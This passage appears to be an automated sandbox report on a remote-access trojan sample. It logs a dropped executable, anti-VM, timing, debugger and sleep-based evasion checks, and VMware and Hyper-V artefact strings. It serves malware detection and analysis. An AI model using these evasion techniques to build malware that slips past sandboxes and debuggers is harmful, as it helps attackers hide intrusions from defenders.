Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59904 second address: 2B5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2B59B7E second address: 2B59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999904 second address: 299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 2999B7E second address: 2999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: AF00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 9640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6799	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4277	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5651	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 890	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9652	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 1.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe TID: 5332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe TID: 6332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 4277 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -8554000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 5651 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -11302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -638000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 9652 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -19304000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000009.00000000.2154297535.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000009.00000002.4578457861.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2163252366.0000000008C55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_01172B60 LdrInitializeThunk,

7_2_01172B60

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_007225B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

15_2_007225B2

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160124 mov eax, dword ptr fs:[00000030h]	7_2_01160124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C156 mov eax, dword ptr fs:[00000030h]	7_2_0112C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov ecx, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov eax, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172160 mov eax, dword ptr fs:[00000030h]	7_2_01172160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01170185 mov eax, dword ptr fs:[00000030h]	7_2_01170185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0118E1D8 mov eax, dword ptr fs:[00000030h]	7_2_0118E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011601F8 mov eax, dword ptr fs:[00000030h]	7_2_011601F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4000 mov ecx, dword ptr fs:[00000030h]	7_2_011B4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C020 mov eax, dword ptr fs:[00000030h]	7_2_0112C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A020 mov eax, dword ptr fs:[00000030h]	7_2_0112A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132050 mov eax, dword ptr fs:[00000030h]	7_2_01132050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6050 mov eax, dword ptr fs:[00000030h]	7_2_011B6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192045 mov eax, dword ptr fs:[00000030h]	7_2_01192045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C073 mov eax, dword ptr fs:[00000030h]	7_2_0115C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A060 mov eax, dword ptr fs:[00000030h]	7_2_0116A060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113208A mov eax, dword ptr fs:[00000030h]	7_2_0113208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011280A0 mov eax, dword ptr fs:[00000030h]	7_2_011280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B20DE mov eax, dword ptr fs:[00000030h]	7_2_011B20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0112C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011720F0 mov ecx, dword ptr fs:[00000030h]	7_2_011720F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0112A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011380E9 mov eax, dword ptr fs:[00000030h]	7_2_011380E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B60E0 mov eax, dword ptr fs:[00000030h]	7_2_011B60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150310 mov ecx, dword ptr fs:[00000030h]	7_2_01150310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C301 mov ecx, dword ptr fs:[00000030h]	7_2_0112C301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132324 mov eax, dword ptr fs:[00000030h]	7_2_01132324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov ecx, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0119634C mov eax, dword ptr fs:[00000030h]	7_2_0119634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B63C0 mov eax, dword ptr fs:[00000030h]	7_2_011B63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011663FF mov eax, dword ptr fs:[00000030h]	7_2_011663FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
